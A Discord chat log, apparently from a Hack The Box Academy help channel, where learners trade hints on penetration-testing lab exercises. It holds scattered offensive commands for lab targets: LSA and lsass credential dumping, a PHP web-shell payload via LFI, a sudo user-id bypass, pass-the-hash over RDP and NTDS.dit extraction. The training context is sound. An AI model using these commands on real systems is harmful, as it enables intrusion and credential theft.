starts at this

Hint: think about all the subdomains you're presented. One of them you can zone transfer to

You'd do it as dig axfr subdomain.inlanefreight.htb @ip

OH

Hi guys I am curious, if you start with a bad webshell or other semi intetactiv shell what is the first thing u do. Do u immediately get a msfvenom shell to the machine?

For the purposes of htb course

Hi all module: Attacking Common Services HARD
Question 1, What file can you retrieve that belongs to the user "simon"? (Format: filename.txt). I tried enumerating smb with smbclient, just see the shares, not able to login using the username simon, tried bruteforcing but not working, seems like all passwords are turning correct...., enumerated bruteforced all services but no chance. any tips please?

i gave up so i just made it do it automatically using a simple bash script i made

enumerate harder, you can definitely access SMB

i just made it do "dig afxr" with every other line from the outpt

aaahhhhhh! all of a sudden everything works. thanks.

You got it?

Don't forget the @ip

yes, but I am quite sure I tried it before, don't know why didn't work before. lol

yeah i know :)

solved it finally

You can also dig txt

ik

onto the last question of Active Subdomain Enumeration

But the axfr gives you more info for the next questions

ik

It happens, an extra space somewhere could ruin everything

I want to be a professional in digital illustration. Python is far from my reality. But let's go!!!!! ...... ⚽ 🏈

Htb has nothing to do with digital illustration

Yes I know!!!!! But I like Python a lot. I have a brother of mine who is a software engineer and how he would like to learn and pursue a career in this area as well, if you know what I mean.

funny

What do you mean?

Many people have two professions and they manage to stay that way for the rest of their lives.

https://tenor.com/view/batman-riddler-jim-carey-riddle-me-this-villain-gif-16662156

Are you saying that they want to delve into application penetration testing and security?

Hello! I got stuck at Password Attacks, Attacking SAM. There is this last question about Dump the LSA secrets. I got the users through SAM dump but i cant dump remotely the LSA secrets, is ther any tip for that?

can you "spoilertag" the command used to dump remotely the LSA?

fhu im not sure how to do that 😄

Put || in front and behind the command ||lol||

| test |

|| test ||

|| crackmapexec smb ip --local-auth -u usr -p pw--lsa ||

Add a space after the pw

yeah thats okay

i just edited it

make sure to use a highly privileged user

That too

aham

Lsa dumps can only happen with enough privs

thats what i was thinking, but the hashaes didnt contained any high priv user

admin field was empty

but there is probably something that im missing, thank you

https://www.crackmapexec.wiki/smb-protocol/obtaining-credentials/dump-lsa

https://www.crackmapexec.wiki/smb-protocol/obtaining-credentials/dump-lsass

You're welcome

how did you dump the sam, with samdump2? In that case just use impacket-secretsdump

i used secretsdump.py

I went to see my notes, yes it's empty so gotta enum the other users to see what priv they have then MarcieLee did the rest

thank you for the help, have a nice day

Whoever wrote the Thick-Client applications topics in Attacking common Applications is mental. All this teaches you is how to copy code

What is the biggest module in terms of content? just finishing up password attacks and she was HUGE haha

Wait til you see Windows Priv Esc or attacking + enumerating AD

I'm gonna need a bigger boat

password attacks is only an 8 hour module isnt it?

Yeah it says that on the tin but its taken me much longer

Wait til the 4 day ones lol

especially with the skills assessments, where you're brute forcing for some period of time

not complaining they are really good modules, just big chunky boys

oh yeah absolutely man! they're amazing - gg to the HTB team

I am complaining about attacking common applications as its ridiciulous

haha really? what's broken

theyve just rehashed a insane box walkthrough and all it teaches is how to copy code to solve that problem

could potentially put the code into snyk add-on for vs code?

idk

sure I'll have loads of fun when I land on her haha

you have to decompile and tweak the source code for this custom application, good in hack the box. not good in academy

guys im doing the ATTACKING ENTERPRISE NETWORKS module currently I'm trying to enumerate the blog.inlanefreight.local but every time i try to register and account or login i get the following error "The website encountered an unexpected error. Please try again later." is this part of the assessment or is it an error that should be solved ???

The timing on the modules is arbitrary to attract businesses to pay for it/enterprise training

did you ever figure this out? I am in the same boat

yes mate, im on the next one now which is just as bad, DM me

Thick client has been wildly agreed upon to be the dumbest addition to that module

im literally skipping it

lol

yeah it just teaches you to copy code rather understand anythign

looking forward to seeing that mess lol

You still have to complete that section to take the cpts exam

doesnt mean to read it, just answer the questions

wasnt that the Java application

you need to read it to complete it

is it the Java app

yeah you need to reverse and modify it

i have the questions already filled

i used the Fatty write up as guide

yeah what ive been doing

nice decision

thats why i said im skipping it

just spending hours trying to get this stupid fiddly 1 time use application to work when im trying to learn

it makes sense in HTB not academy

true af

can someone explain to me how this works and why cme didn't find it? 🙂

spoilers

cme is giving a weird error related to the response received

just use hydra for FTP

try with NetExec and if it still doesnot work you can reach the developers in its Discord

and they will ask you to open an issue, they will fix it

Hello everyone,Module:Footprinting,Section:Hard Lab, i have found open ports, tried enum a pop3 and imap but need creds, tried braa and snmpwalk but there is nothing, trying right now a onesixtyone to bruteforce, but there is nothing also(tried 2 different wordlist), could anyone help me pls?

netexec got it, but is much slower

cant be much slower since its the same software 🤣

just renamed

cme is dead

has to be anything else

you can use threads

idk, it has like 1 sec between tries, maybe i can increase the threads

snmp is the way

the order is onesixtyone bruteforce community string and after that snmpwalk with the community string

probably because before cme was giving connection error

error was faster than successful try

Hi folks

I am preparing for the offsec OSWE exam. Which HTB Academy modules would you recommend?

i would look at the new web modules from bmdyy and vautia.

Is there any module about Recon at HTB?

there's this if that's what you mean

praise the lord that is over

back to changing url paramters on tomcat

Can anybody please help me? I am in Linux Privilege Escalation, in the Sudo module, and I found the flag.txt using 'sudo -u#-1 /bin/ncdu cd /root,' but I can't read the contents of flag.txt.

well you could just replace cd /root with cat /root/flag.txt

but I also recommend googling about ncdu, there's a way to drop into a root shell

I am getting this error " Error: could not open /root/flag.txt │ Error changing directory: Not a directory "

Sounds like its not the right directory

mostly sounds like it's not meant to work that way

have you looked up exactly what ncdu does and how it works and what arguments it expects?

look at GTFO bins

What should I be searching for?

the binary you can exploit

Module:Windows Priv Esc
Section:Weak permissions
done everything and got a administrator group, but cannot dir a folder with a flag, could anyone help me?

Module: Local File Inclusion
Section: RCE
I understood and replied the concept for RCE using LFI, the problem is when i try to 'cat' a file, or try to trigger a reverse shell. Seems like i can only pass a single command(id, whoami) and whenever i use spaces or some other character it just doesn't execute the payload anymore. I tried to close the command in ' ' or to URL encode but neither worked. Some hints? The goal is to read the flag in /
For example this request doesn't work: ||curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=cat /flag.txt" (of course i changed the IP and PORT)||

id depends where your injecting the paramter and how the server processes it, might need to url encode spaces etc...

or instead of trying to inject that PHP shell you could try one that spawns a rev shell

I also tried to URL encode the command but had no success. Also tried to spawn a reverse shell and this didn't work too. I'm for sure doing a dumb mistake but i can't figure it out lol

im pretty sure i done that one with just the simple web shell. is the flag defo called flag.txt and not a bunch of random numbers like some of them

Hi everyone
Does anyone coud help me to solve the last question of Documenting & reporting assessment please?

Yeah u were right the flag name had a random name, i forced too much the assumption of the flag name, thanks

they do that to prevent against LFI if thats not the main aim

Yeah it makes sense, it's not the first time they did that so i don't even know why i haven't thought about it, thank you again!

hi, struggling with the lab Attacking Common Services Hard, last question, I am at the stage of looking for mssql users to impersonate, I found the user J**** only, but seems like there should be 2 impersonable users, I am really lost and have no idea what is the next step I need to take. I found the second server with as well, but have no clue how to connect to it as well.

Check for connected servers

But idk how deep you are into it

You can impersonate other users for sure though

Just follow steps in the sql section to figure it out

log out and then in back

🤦‍♀️

thx 👍

Hello. Why i can not own vip machine? Do i need to pai Money?😪😪

Ok i see 14$/month

Wrong chat btw my guy

Read #welcome and #rules

Not sure if this is the right place to ask, but are parrot servers down right now?

I'm getting slow speeds on both their linux distro downloads and apt repos

Read the about section of this channel and #welcome and tell me if you think that this is the right place, they have their own discord btw

Hey, hope this question is correct to ask here, but I am trying to start the browser VM and I am being told that I have 1 instance a day and I can't open it. I used a web VM for the intro module...but was that it? I cant just use that one? There was like 180 mins remaining on it. Am I missing something?

When you close it out/terminate it, that's it

You can use your own vm and download the vpn configuration file all you want

Or subscribe

I was afraid of that. Okay.

Or buy cubes

thank you @fathom pendant

Why would you be afraid of that?

Lol they're a company. They're all about making money, and the pwnbox is a convenience thing rather than a need to use thing

Like you can absolutely get by using your own vm

I mean VMs are billed by the hour, so it should be no problem just letting users use it until time is up. But like you said, they are focused on dat cash $$. So I understand.

Well their stuff is hosted in their infrastructure mostly

You're paying for the convenience to use it, and you aren't paying an hourly rate for it

Literally just give them any amount of money, i.e. buying the smallest cube option, and you get it unlimited

Forever

Unlimited VMs forever for $5

?^

Unlimited pwnbox usage forever

The vpn and using your own vm is always free

That's not that bad

Thanks for the info

you'll end up paying for later content anyway ¯_(ツ)_/¯

For the tests?

No I mean you literally cannot do all of the content without paying some amount of money

Ah

Only the tier 0 content is relatively free as they full refund the cubes

So some modules you will never have enough cubes until you buy

Iirc someone did the math and it was like one month Plat and one month silver to have all the cubes for cpts

so $86 for all material?

Unless you're a uni student then do the student sub for $8/month AND you get access to all the modules up to and including tier2

👍

Hello, I am currently working on the module Web requests/POST and I cant seem to figure out how to correctly formulate the command to get the flag

Is it possible that I run this command 'rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full' and the reason why I cannot locate the 'lsass.dmp' file( using the 'dir /s lsass.dmp' command ) is because the AV software prevented that command from creating 'lsass.dmp'

What module is this?

https://academy.hackthebox.com/module/147/section/1359

you cannot generate it in C:
donno why

i don't know why, put it in C:\Users\<User>\

this module is this https://academy.hackthebox.com/module/35/section/224

That also didn't work for me

I also used 'Administrator' as username and that also didn't work

—data-raw instead of -d

it works with -d

oh youre doing it from windows

yea

curl is a alias for iwr

i dont know how it works there

just use parrot or kali and the usual curl

okay thank you

also you can do it from browser

changing the user agent

you create a custom device and put curl user-agent there

then enable the device emulation and voila

could i get some help to reset akerva

need 4 more people

no because this is #module chat

read #welcome to access the rest of the server

sorry about that

thanks

I assume you'd also have to follow a specific pattern of unlocking, which could potentially suck
Do you still have the info?

transfer to windows and double click once to mount

after mounted double click to open

Can you please explain me one thing. i am currently going through the web attacks module, IDOR. it talks about changing a parameter, but what if there is a post request containing only an action with no user id, for example {'new_name': 'Alex'}. i assume the user id is in the cookie. Does this apply to idor? and is it possible to hack this if for example the id is stored in PHPSESSID?

one month plat and one month gold 1500 cubes

follow the cpts path

thanks!

yes

it’s taught on the module

under protected archives iirc

what

double click it

and it will get mounted as drive

you dont need any program

that didnot happen to me

i dont know

probably 7z opens it

please someone. i tried to find this on the internet but no luck

disk management > action > attach vhd

you have to be Administrator of your PC

but this manual method should be automatically done when double clicking

https://www.php.net/manual/en/function.session-id.php

any time

Anyone there that has done the Attacking Enterprise Networks Web -Enumeration & Exploitation module or has had a similar issue? I am tampering with the HTTP verb. Its just a blank response in Repeater

I´m on "Whitebox Attacks - Clientside ProtoPollution" and I think I need a sanity check, DM would be appreciated

Module:Windows Priv Esc,Section:Citrix, what i need to type here? i tried ||humongousretail.com|| but it gives error, could anyone help pls?

Module: Footprinting - Lab Hard:
Task:
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.

For now:
I was able to find the SSH key and log as ||tom||, I found some UID stuff, but nothing more, how can I continue? Does it have to do something with the info I found here ||https://gyazo.com/1811c8b8459cc7cfe2f8058670cd6f65|| I saw previous comments that talked about ||mysql|| How can I access this service?

try login to mysql, there u will found a HTB user

If you have the ssh key and got in as Tom

Duh, is there a port where it even runs the service.

Yeah I got that.

I ran through all the directories.

When you log in do ls -la

You can ssh to root with the key

I did simply ls ;-;

BRUH

I thought of downloading LimEnum on the target

To esacalate to admin

Nah it’s a footprinting module, not privesc

Damn..ls -la is better than ls.

Thank You 2, kind people.

o7

Did you mean to connect with the ssh key as in root@<ip>?

ssh -i key root@ip

Oh..lemme try that.

I thought I had to log in as tom and do shenanigans there.

It workedd.

But is that like..specific or it will require a password?

Or is it general that when I have an SSH key I can log in to root.

It’s not general

Oh so it's just this time.

Yeah this time

Thank You, I found the ||users.sql||

You’re welcome

It’s not accessible with tom’s perms right?

Nah.

Lemme send you a screenie.

Alright; then I do remember correctly

Anybody here who has done Whitebox Attacks ?? I´m losing my mind over Client-Side Prototype pollution rn, I already got some XSS going....

Hi , would I use 'hklm/security' to transfer my 'lsass.dmp' from my target machine to my host machine?

exec 3<>/dev/tcp/10.10.10.32/80
any idea how to use it?

what are you trying to do here?

I am trying to move the 'lsass.dmp' file to my attacking host with the 'smbserver.py. tool.

Your smbserver command is wrong

^

🤣

the module teaches the right syntax

also there are examples in the help panel

I tried using on the pwnbox these commands

$ exec 3<>/dev/tcp/10.129.93.37/80
$ echo -e "GET /upload.zip HTTP/1.1\n\n">&3

my terminal closes immediately any idea why it is happening

am I using it wrong?

what do you think about skipping metasploit module?

if im experienced with it

coz i want to do attack common services

this night

Okay fixed it. Would my share now be on my attacking machine or would I have to keep the smbserver command running? I ask because I don't see it.

try to go as far as you can I guess xD

my question actually is about skipping metasploit module

i have like 4 sections done for the common services one just to answer some questions on this chat xD

The smbserver is just to transfer files once done you can stop it. Please understand the command before you run it. here you copied the lsass.dump to / directory of the attacking machine

Its my first time running it and I didn't understand it fully the first time. I live and learn, thats life

Still nobody online for Prototype Pollution? I´m pretty sure I went down the right rabbit hole but still not getting it to work

Brute Force Skills Assessment 2

1. I used cupp -i using Harry Potter's information for the password list
2. I created a username list ./username-anarchy Harry Potter > harry.txt
3. I used hydra hydra -L userharry.txt -P harry.txt -u -f ssh://94.237.59.185:47416 -t 4

It's been a half an hour now and no hit. I repeated exactly what we did in the module again, but it seems I am wrong. Please help

Shouldn´t take half an hour

Hint: Try to work with minimal information for the wordlist in the beginning and gradually increase what you add using cupp

Thanks I will redo the question with less info in cupp

Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. getting no response from the ls command after logged in smb

Please I do I login to the terminal back

How do I login back

no command is working in smb

..

he also have same problem

@tulip dragon

its telling yall access denied

means bad login info/wrong share

ok

i've been trying to figure this one but i was not able to get the new name, any chance for where to look for? thanks got it

tried everything still same error

which was the smb one?

let me try in my side

it works for me with the correct share

smbclient //10.129.17.74/spoiler -U 'spoiler'

try resetting if you are doing it correctly

<@&861185840277487616>

ty @thorn urchin

Popular unpopular opinion: Attacking thick client applications is the worst section in the Attacking Common Applications module and does not belong.

That is all, now I have more pain…err…I mean learning to do and alcohol to drink

ok I will see

yeah many time resetting helps

great how FTP service does not even wake up with target spawn in common services module 🙂

how did you solve this part? i’ve reset it 5 times but still no FTP service showing up

7 resets 🤣 niceone

hi quick question, i'm on the windows privilege escalation module - section Further Credential Theft
I'm stuck on this question: Find and submit the password for the root user to access https://vc01.inlanefreight.local/ui/login
I've got all the other questions but I'm unsure if I'm missing something or simply over-looking something very obvious.

You're doing a -p- scan yeah?

I still remember, i did like 10 to 12 resets and still couldn't manage to get the service and in the end I asked for the ports directly and then I did more resets and port scans only on those ports.

Just finished the Windows event logs and finding evil, found it quite challenging was good.

Hello! I'm stuck at the "Password Spraying" section of Using CrackMapExec. The question is "Which other account has the STATUS_PASSWORD_MUST_CHANGE flag?". The only user I can find is peter, but that doesn't work. I tried both peter and inlanefreight.htb\peter.

There is a second user with this status

Where can I find the longer username list? This is the list I'm currently using:
noemi
david
carlos
grace
peter
robert
administrator
I can't find any other lists in the module too.

At the very beginning of the module you need to create a user list. Use this list

would anybody know why the command "download" is not working in Evil-WinRM? I get an error

nevermind its working now

so weird

Eh the tool is always weird

Got it! Than kyou.

always do

anyways managed to do it was just a matter of resets o.O

any idea why crackmapexec doesnt dump lsa

no admin privileges

you need (Pwn3d!)

like when you can do psexec

but the user has access to dump lsa

SeDubugPrivilege

?

the user has privilege to get lsass.DMP

if it is not an local or domain admin

you need administrator level to dump SYSTEM memory processes

not only SeDebugPrivilege

well but this says me to do so

yes with a minidump then

use pypykatz from linux or RDP and do it from the task manager

i manually created dump from task manager and transferred it to my machine, but idk how to crack it

pypykatz for example

I´m back at the Client Side Prototype Pollution from Whitebox Attacks.. anybody here who can give a sanity check?

the names scheme now is tool.py

so ntlmrelayx.py

anyways this is weird i just noticed you are installing impacket-scripts

you git cloned it

the best way to install is pipx

check the file pointed by the symbolic link

👀

just install it following the github repo instructions

then

cd /opt/impacket

pipx install .

easy as that

It also probably doesn't help you're moving around as root

Oh wait nvm

I'm dumb

I'm used to root being the red color

Not regular user

But yeah tbh why are you su to root to do things?

not installed in the normal user

installed in this user

be careful what you install with inpacket, it's really want to broke but here some stuff i used to install impacket in a virtual environment (on the pwnbox)

wget https://github.com/fortra/impacket/releases/download/impacket_0_11_0/impacket-0.11.0.tar.gz; tar -xf impacket-0.11.0.tar.gz;cd impacket-0.11.0/

virtualenv --python=python3 impacket
source impacket/bin/activate

python3 setup.py install

nice

dont use virtualenv if you can use pipx

You can do both

pipx way better

you dont have to play around with source activate

oh no that's just for quick testing, i mainly used pipenv shell now

🤷🏻‍♂️ try pipx

you will be surprised for sure

Aye will going to college help with hacking? Like computer science or coding classes or what?

read the instructions from the source 🤣

this isn't really the place for that bro

not the right channel, read #welcome

Most you'll get out of college is cybersec (aside from clubs)

good morning all, currently doing the Bypassing Encoded References within the Web Attacks module, and having an issue with the script to get the 20 employment_contracts.
So the code I have at the moment is:

for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "filename=contract_$hash.pdf"
http://<server>:<port>/download.php
done
done

I've had a look through Burp and thats how I came up with the 'filename=' part (oh and obviously i've changed the IP and Port lol). I don't know what it is with this module, i understand the concept but just can't seem the get the parameters correct. Any help greatly appreciated.

Because you're using backticks instead of single quotes here it's fucking with your formatting lol

i was wondering why the formatting looked terrible, it wasn't like that when i was typing. i'll reedit

does someone knows why I am getting this weird output? and why is after my port 1234 the number 72 (green)? Every time I press enter, a new one appears: "PS C:\Users/name"

Don't forget the semicolons to end your statements

Hello I am in module Linux Local Privilege Escalation - Skills Assessment and i am trying to get the flag5 but the sudo busctl doesn't give me a root shell. Any help?

https://gtfobins.github.io/gtfobins/busctl/

Thank you I solved it !!!!!

Hey guys, quick Q about Joomla template code, does it decrypt md5 automatically ??

@acoustic owl you helped me with whitebox attacks, ppollution, can I DM you for a sanity check for Client-side pollution?

I have solved this in another way, try to have a look at the code for "contracts.php" in the "Debugger" when you open "inspector". From there you can write a quick script as well. Don't just copy and paste the code from the learning material, try to do it yourself

sure

cool thanks I'll have as look 🙂

I'm currently stuck here too. The services.exe is incorrect. I can't sleep HAHAHA

Go to the log entry referred to and see what happens after that

After that you should be able to sleep again 😉

"But I guess my best wasn't good enough"🎶 🤣 😴

I have told you what you have to do. Look at the log entries, directly after the specified entry.

Oh, my God! You saved me! 😭 Thank you so much

Sleep well 🙂

Hello! I'm currently doing Intro to assembly module and I've run into an issue regarding debugging elf files. When I try gdb -q ./hello_world I get:
Reading symbols from ./hello_world...
(No debugging symbols found in ./hello_world)
I also tried debugging the elf file given in section Assembling & Disassembling but I got the same result

Hi , I am having trouble copying the ntds.dit file from the VSS volume drive. I have tried the command twice with two different path locations.

https://academy.hackthebox.com/module/147/section/1326

Apparently I had to add -g when assesmbling the helloWorld.s file. Issue solved

read the error message it tells you why you cannot copy the file there

Now that I have 'NDTS.dit' file copied onto my attacking machine ,what can I do with it?

Crack passwords

you can dump it with netexec

a.k.a cme

would secretsdump.py work since its a SAM database?

you need the SYSTEM

How do I supposed to use Words.GetWordList() in the introduction to c# - skill assessment?

I already find out how to iterate through a wordlist but still have no idea what to do with the Words.GetWordList(), this is my current code:

class Program
{
    public static void Main(string[] args)
    {
        List<string> path = new List<string>() { "a", "b", "c" };

        foreach (var item in path)
        {
            Console.WriteLine(item);
        }
    }
}

do I need to go back to my WINDOWS machine to determine where the SYSTEM is or is the SYSTEM in the same file location on every windows machine?

the SYSTEM from the machine where u got the ntds

but all of this process is automatized with crackmapexec

The -target-ip isn't the target?

Oh I know. I already got the answer with crackmapexec. The section wanted me to do the longer method too and I want to know it

for this to work you have to dump with LOCAL flag

you have to transfer SYSTEM to your machine

So I have execute a command like this(cmd.exe /c move C:\NTDS\NTDS.dit \10.10.15.30\CompData ) but only for the SYSTEM and not the NTDS.dit?

you need both in your machine

can anyone assist in helping me with the passwd opasswd shadow section of password attacks module i am struggling to complete the question

yes just ask

https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/

could you help me i am asking

How do I supposed to use Words.GetWordList() in the introduction to c# - skill assessment?

I already find out how to iterate through a wordlist but still have no idea what to do with the Words.GetWordList(), this is my current code:

class Program
{
    public static void Main(string[] args)
    {
        List<string> path = new List<string>() { "a", "b", "c" };

        foreach (var item in path)
        {
            Console.WriteLine(item);
        }
    }
}

please help me with this, been stuck on this thing for days

could you help me i am asking

ask your question

and we can help

so i wants to know the root password from the shadow file but cant copy it to attack box no permisions i log into user will and find the .backups but cant open or copy them to unshadow

set up an http server and download em from your machine

could you explain how to do that

https://academy.hackthebox.com/module/details/24

good module to learn about this stuff

take a look

hey guys currently at attacking common service module for RDP cant figure out how to pass the hash from the admin or more where can i find it (im not supposed to use mimikatz)

im still having difficulty could you walk me through the steps

no

im not doing your job

rdp section?

yes sir

remember to enable the registry key

xfreerdp /u:Administrator /pth:"<hash>" /v:<IP>

yeh already added the reg key but how am i supposed to know the NT hash buddy

its on the desktop

in a txt

RDP to 10.129.203.13 with user "htb-rdp" and password "HTBRocks!"

there

my stupid head didnt even open the txt my fault bro sry for bothering you

appreciate you raf

enum is key

it is ❤️

its already cracked

instead of the wordlist

add --show

hashcat -m 1000 <hash> --show

ofc its the same from CME

Haven't done the section, but I could try to help. DM?

hi y'all, I'm struggling to find the answer for the question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) into ACL enum section under Active Directory enum & attack

so far I tried by bloodhound and PowerView

bloodhound is not showing too much and PowerView is taking a live to show a command output

sweet, DM?

Reading the section, It says that the wordlist that you need to iterate through can be accessed with Words.GetWordList() method. That's what it's for.

You'd need to reference the Assembly.dll library into your project to use it.

Anyone is doing this module "ACTIVE DIRECTORY ENUMERATION & ATTACKS"?

anyone can have an idea why is this error:

? : The term '_.SecurityIdentifier' is not recognized as the name of a cmdlet, function, script file,

a lot of us, just put your concern and if someone can help will help....

Ask the actual question you want an answer too or a nudge with you will get a response this way

What's the context? If its part of a module e.g. powerview, did you import it into the current shell?

Because you're trying to call a function/something that isn't imported into the current shell.

yup, PoerView.ps1 was previously imported, I'm trying to grab the last flag from ACL Enum section under AD Enum And Attack module

Recheck your command

Also just FYI you know powerview needs to be imported in different shell instances so if you open a separate shell as a user it has to be imported there too

Hello guys

I- it my f- first day of joining

Hi guys

It's my first day of joinin

Pls I wanna learn some hacking

thank you bud, typo error

Hey man

I'm new

Your help will mean much to me

hey @hazy hollow lot of us are new in this as well, just put you comment, question concern and someone if can help he/she will, no worries about that....

But where

Do I put comment on?

No worries, copy and paste from your notes is your friend

Read #welcome #rules

Oh I really got hacked

Okkkkkk thxxxxx

Thxxx@naive wadi

LoL u r completely right, but sometimes I try do it manually to reinforce the comman in my brain

Btw do u guys hack?

I rlly wanna know

Bcz hacking... MY FAV

Go to #general this is for HTB modules

I'm studying the cpts to certify and at the same time to have strong foundations for other certs like PNPT & OSCP trying to get in into the pentesting | red teaming field...

Huh?

Ok?

Hello I have a problem on the exercice (transfer file) I have a flag but It is not valid, so I look a video and It is the identical flag, what should I do?

hey guys im currently doing ATTACKING ENTERPRISE NETWORKS blind and i have managed to get a foothold and escalate privilege to root im currently scanning the internal network with dynamic port forwarding and nmap with this command "nmap -v -Pn -sT 172.16.8.0/23 --proxy socks4://127.0.0.1:9050 -oN scan.txt
" and i noticed it took more than 3 hours and it still hasnt finished is there any tips to make it faster, and in the CPTS exam will it take the same time ???

Make sure you have no spaces at the beginning and ending of the flag while submitting

This is the answer @dreamy solar

I already saw

did you extract the file in the ".zip" archive?

yes

I don't access administrator

yes ok, but I can't see the extracted file...

Aldo have you ensured that the file you uploaded has the same hash as the original to ensure the transfer was successful?

gunzip -S .zip upload_nix.zip

hasher <filename> and not cat <filename>

oh I am bad

Ok thanks you very much

If you have access to the external/internal machine instead making a nmap scan why don't you try a pingsweep on 192.168.8.0/24?

Been there

tried didnt work ```proxychains fping -asgq 172.16.8.0/23
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

 510 targets
   0 alive
 510 unreachable
   0 unknown addresses

2040 timeouts (waiting for response)
2040 ICMP Echos sent
   0 ICMP Echo Replies received
   0 other ICMP received

you can't ping through proxychains

only TCP packets

opsss let me re try from the foothold

hello guys]

im doing the web proxu model

in the skill assessement

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

i did all the necesseray steps

but when im getting the results of the attacks

i cannot find the correct one they all ghave the same lenght all with 200 ok respond

it worked thank you so much, wow it took me forever scanning

did you check the "content-lenght"?

yes

<@&861185840277487616>

btw i found that all the coockies they show the flag after sending theme to the repeater

XD

can someone help me solve the passwd shadow section

trying to get root password i can get in but cant seem to have any permissions

can u share with us the module the section then the question

if u can so i be able to help u brother

passord attacks

passwd opasswd shadow

passord attacks

ill check my notes

ur question was

?

passwd opasswd shadow

Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

can u tell me what u did so far

u can dm actually so we dont spoil other people

i got into will then ls -al .and found .backups then ls passwd.bak and shadow.bak but cant open shadow.bak or transfer or open to get the hash

also got sams password

Use unshadow and make the output in the /tmp dir

Then transfer to ur local machin to crack the pass

If it didn’t work tell me so ill go re do the exercise

i dm you

I dont think unshadow is on the target machine. You should be able to transfer the files

ill redo the task

<@&861185840277487616>

Fuckin scam bots

lets go

I am trying Excercise 3 from Google Hacking. On and on for 3 weeks, but no result/answer. Can someone give me a nudge? It is starting to loose the fun out of the PEN-200 path.

So Google Hacking from Info gathering/Passive gathering

You should post what youve tried and the exact question and it'll be easier for someone to provide help

Well, I looked and searched on all mayor Soc Media platforms. And tried Google dorking.

Exact q is: What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?

Hello everyone! Modul:Password Attacks Section:Pass the ticket from linux; Question:which group can connect to LINUX01? Im stuck - any hint

Which module, which section?

What have you already tried?

@acoustic owl first of all im a totaly newby! Tried enum4linux

There is no Google Hacking

@acoustic owl also evil-winrm and tried sharphound.ps1 but no luck

hey guys, sorry to interupt conversation. but i'm struggling with this https://academy.hackthebox.com/module/77/section/853 for more then 5 hrs already. I've done everything, i got root access, but when i want to get the root/root.txt file like this cat root/root.txt it just doubles the text I type and nothing happens. Any ideas? please

Look in the module how it was done there
Don't worry, everyone here started from scratch.

also i tried with metaspoilt, but always getting [-] stdapi_fs_stat: Operation failed: 1

bro

go to OffSec group

HAHAHAHA

This is not from HTB Academy …

ah, im sorry

That group they say to ask here. So what is it?

my brain is like mashed potatoes already

theres no way

🤣

So getting send there and back here. Nice!

this is HTB academy

If yoiu go back they will just say Try Harder

This is about modules in the HackTheBox Academy

Wait wait wait. Totally mu fault. Mixed the 2 up.

well it is 😄

😹

@acoustic owl which section cant find it

Doing 2 paths at the same time.

no problem mate

so should be on right spot

can someone help me, please?

Sorry for that guys. Have a great evening.

in the PtT section, the command u need is id

With?

well it's night for me, but i started evenining 😦

hey guys, sorry to interupt conversation. but i'm struggling with this https://academy.hackthebox.com/module/77/section/853 for more then 5 hrs already. I've done everything, i got root access, but when i want to get the root/root.txt file like this cat root/root.txt it just doubles the text I type and nothing happens. Any ideas? please

this one, please 😦

no my bad

realm is the tool y have to look for in the section @sudden blaze

Did you upgrade your shell?

I'm quite new to this, but i guess I updated everything

Also you'd need to cat /root/root.txt

Tried with metaspoilt too, but got some error aswel

Just follow through the section

i Tried, but whateber i type it shows doubles and no response

It walks you through it

i've been doing it for more then 5hrs

You probably skipped something

but when i gain root access and type any command and sends it then it just doubles the command and does nothung

Hello

Because you're not in a full shell probable

probably your shell is broken

how do i fix my shell?

explained in the module iirc

Did you do the command as shown in the module to gain access?

Yes i did everything, really :/

@sly dome thx had the command but didnt saw it thx

iirc?

python3 -c 'import pty;pty.spawn("/bin/sh")'

It's abbreviation "if i remember correctly"

I didd that

Could you please send some screenshots then?🤔

ah, alright

Respawn the box and start from the top

I closed it, but i!ll do it again

give me guys 10 mins i'll be back

They can't post screenshots, their main account isn't linked to the discord

Before you can send printscreens, you must verify your user. Read and follow #welcome

Oh

But really i tried coupled of times

You probably skipped steps

Will try again tomorrow

I guess I should take rest now 😄

WIll give feedback tomorrow

is there a chance, that maybe i coppied wrongly LinEnum.sh maybe with some space or something?

I will try it now 😄 i won't get to sleep otherwise

LinEnum shouldn't be necessary I don't think

btw I was using MATE terminal

(Also linenum wouldn't break a shell)

You should be using LinPeas.sh from the nibbler user, but the purpose of that script is only for you to identify the path to root

In the module they use LinEnum.sh

...which you are offered directly in the learning material on the page you linked. That said it's of course good practice to copy over files still

Just take it one step at a time

^

Don't skip over steps

Don't move forward too fast then try and catch up

Just follow the module verbatim

Ok, will keep you posted soon

So I did it again

👀

and same happens

i sent once and it's double again 😦

but here is correct
connect to [10.10.14.170] from (UNKNOWN) [10.129.100.178] 36502

whoami

root

Mhm

weir is that it does not even say who sent that cat ...

and i cannot do anything, its like writing in notepad 😦

You got a response

it doesnt respond to anything expce ctrl c

...

the response i s the same thing i type

No it's not

You typed "whoami" you got "root"

that was in different terminal

So

Why aren't you doing it in that terminal?

in terminal nibbler it does not work

Yes

is i t in that?

That's expected

ogm!!!

omg

i am idiot

Yes

it works now

nibbler is acting as a backdoor for you now. it's "blocking" as long as the root shell is active. It's the root shell you need to use now

i spent 5 hours 😦

ahh

Reading is important

Thank you so much

The section even tells you

I guess ill never forget it

There you can spawn the python pty

Yeah, I am idiot

so are we

welcome to the club

Hehe thank you so much

I may be stupid but I'm not an idiot

almost midnight, wanted to sleep, but hell with sleep 😄 going further

Rest is important

we just got more experience at being dumb, Marcie

It helps you to avoid simple mistakes

Will try to login with different email here, seems like mine got blocked while i was trying first time

That is also true

App.hackthebox.com and academy.hackthebox.com are separate logins

